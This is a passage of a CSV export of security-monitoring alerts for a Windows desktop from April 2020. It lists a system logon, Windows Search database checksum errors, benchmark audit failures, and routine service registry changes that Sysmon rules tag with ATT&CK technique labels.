+RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 26, 2020 @ 10:45:35.080",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 26, 2020 @ 10:45:34.346",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 26, 2020 @ 10:45:34.314",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x250 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:45:34.284",3,"The database engine attached a database",,"""SearchIndexer (4560,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000013:00D9:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000004 +J(0) +[2] 0.000235 +J(0) +M(C:0K, Fs:24, WS:32K # 0K, PF:32K # 0K, P:32K) +[3] 0.008573 -0.004717 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:13, WS:-752K # 0K, PF:-752K # 0K, P:-752K) +[4] 0.000111 +J(0) +[5] - +[6] - +[7] - +[8] 0.002692 -0.001402 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:27, WS:108K # 0K, PF:536K # 0K, P:536K) +[9] 0.018973 -0.000618 (5) CM -0.018161 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:60, WS:240K # 0K, PF:224K # 0K, P:224K) +[10] 0.000243 -0.000150 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:9, WS:36K # 0K, PF:32K # 0K, P:32K) +[11] 0.000012 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[12] 0.000032 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 0K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000004 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 26, 2020 @ 10:45:34.173",3,"The database engine has completed recovery steps",,"""SearchIndexer (4560,U,98) Windows: The database engine has successfully completed recovery steps.""" +"Apr 26, 2020 @ 10:45:34.162",3,"The database engine is replaying log file C:\Winnt\system32\wins\j50.log",,"""SearchIndexer (4560,R,98) Windows: The database engine has finished replaying logfile C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edb.jtx. + +Processing Stats: +[1] 0.090206 -0.030585 (44) CM -0.016607 (5) WT +J(CM:44, PgRf:547, Rd:0/44, Dy:44/1136, Lg:863189/6127) +M(C:0K, Fs:795, WS:2296K # 2200K, PF:2120K # 2020K, P:2120K). +Log record of type 'Commit ' was seen most frequently (1417 times)""" +"Apr 26, 2020 @ 10:45:34.147",9,"Windows Application error event",,"""SearchIndexer (4560,R,98) Windows: The database page read from the file ""C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb"" at offset 17727488 (0x00000000010e8000) (database page 540 (0x21C)) for 32768 (0x00008000) bytes failed verification due to a page checksum mismatch. The stored checksum was [f0820de831010000:0dba80110841f1dd:008071cf8605f3af:7110780f812053b0] and the computed checksum was [0000021c6e69fd07:0000000000000000:0000000000000000:0000000000000000]. The read operation will fail with error -1018 (0xfffffc06). If this condition persists then please restore the database from a previous backup. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.""" +"Apr 26, 2020 @ 10:45:34.118",9,"Windows Application error event",,"""SearchIndexer (4560,R,98) Windows: The database page read from the file ""C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb"" at offset 17694720 (0x00000000010e0000) (database page 539 (0x21B)) for 32768 (0x00008000) bytes failed verification due to a page checksum mismatch. The stored checksum was [0942d802f4820de4:091ad81231011400:310d140071a9f4af:7a60bdc1d8058640] and the computed checksum was [0000021b72421132:0000000000000000:0000000000000000:0000000000000000]. The read operation will fail with error -1018 (0xfffffc06). If this condition persists then please restore the database from a previous backup. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.""" +"Apr 26, 2020 @ 10:45:34.098",9,"Windows Application error event",,"""SearchIndexer (4560,R,98) Windows: The database page read from the file ""C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb"" at offset 17661952 (0x00000000010d8000) (database page 538 (0x21A)) for 32768 (0x00008000) bytes failed verification due to a page checksum mismatch. The stored checksum was [1f981d4df0060f10:1081152c90981e4a:3dbc008077cfd800:1e910040200fdcc4] and the computed checksum was [0000021ae0df7aba:0000000000000000:0000000000000000:0000000000000000]. The read operation will fail with error -1018 (0xfffffc06). If this condition persists then please restore the database from a previous backup. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.""" +"Apr 26, 2020 @ 10:45:34.076",9,"Windows Application error event",,"""SearchIndexer (4560,R,98) Windows: The database page read from the file ""C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb"" at offset 18186240 (0x0000000001158000) (database page 554 (0x22A)) for 32768 (0x00008000) bytes failed verification due to a page checksum mismatch. The stored checksum was [1d18d80a06600baa:d83206600b8200c6:d80079608520f049:00a075cff437e083] and the computed checksum was [0000022aab7f8830:0000000000000000:0000000000000000:0000000000000000]. The read operation will fail with error -1018 (0xfffffc06). If this condition persists then please restore the database from a previous backup. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.""" +"Apr 26, 2020 @ 10:45:34.051",9,"Windows Application error event",,"""SearchIndexer (4560,R,98) Windows: The database page read from the file ""C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb"" at offset 18153472 (0x0000000001150000) (database page 553 (0x229)) for 32768 (0x00008000) bytes failed verification due to a page checksum mismatch. The stored checksum was [bdc588497945ba10:1e94900a90401e58:80009f981e939018:7088fe4f0eda0000] and the computed checksum was [00000229a7da97d6:0000000000000000:0000000000000000:0000000000000000]. The read operation will fail with error -1018 (0xfffffc06). If this condition persists then please restore the database from a previous backup. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.""" +"Apr 26, 2020 @ 10:45:33.990",3,"The database engine is initiating recovery steps",,"""SearchIndexer (4560,R,98) Windows: The database engine is initiating recovery steps.""" +"Apr 26, 2020 @ 10:45:33.978",3,"The database engine is starting a new instance",,"""SearchIndexer (4560,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 26, 2020 @ 10:45:31.435",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 26, 2020 @ 10:45:29.089",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.179037600Z"",""eventRecordID"":""605"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:22.277\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:22.277"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:22.277 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.912",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.150338500Z"",""eventRecordID"":""599"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:45:28.877",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.149957200Z"",""eventRecordID"":""598"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_37a6f\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_37a6f\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_37a6f\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:45:28.835",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.148982800Z"",""eventRecordID"":""597"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:45:28.787",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.148745600Z"",""eventRecordID"":""596"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.707",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.147929900Z"",""eventRecordID"":""595"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_37a6f\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:45:28.653",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.147688800Z"",""eventRecordID"":""594"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.636",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.105949800Z"",""eventRecordID"":""593"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 26, 2020 @ 10:45:28.624",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.105745800Z"",""eventRecordID"":""592"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.597",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.104965400Z"",""eventRecordID"":""591"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_37a6f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_37a6f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_37a6f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:45:28.575",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:45:24.104751100Z"",""eventRecordID"":""590"",""processID"":""2252"",""threadID"":""3272"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:45:21.621\r\nProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000}\r\nProcessId: 592\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_37a6f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:45:21.621"",""processGuid"":""{df9fc3d3-663a-5ea5-0000-00104ea80000}"",""processId"":""592"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_37a6f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:45:21.621 +ProcessGuid: {df9fc3d3-663a-5ea5-0000-00104ea80000} +ProcessId: 592 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_37a6f\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:45:28.554",9,"ATT&CK T1058:Registry edit for new 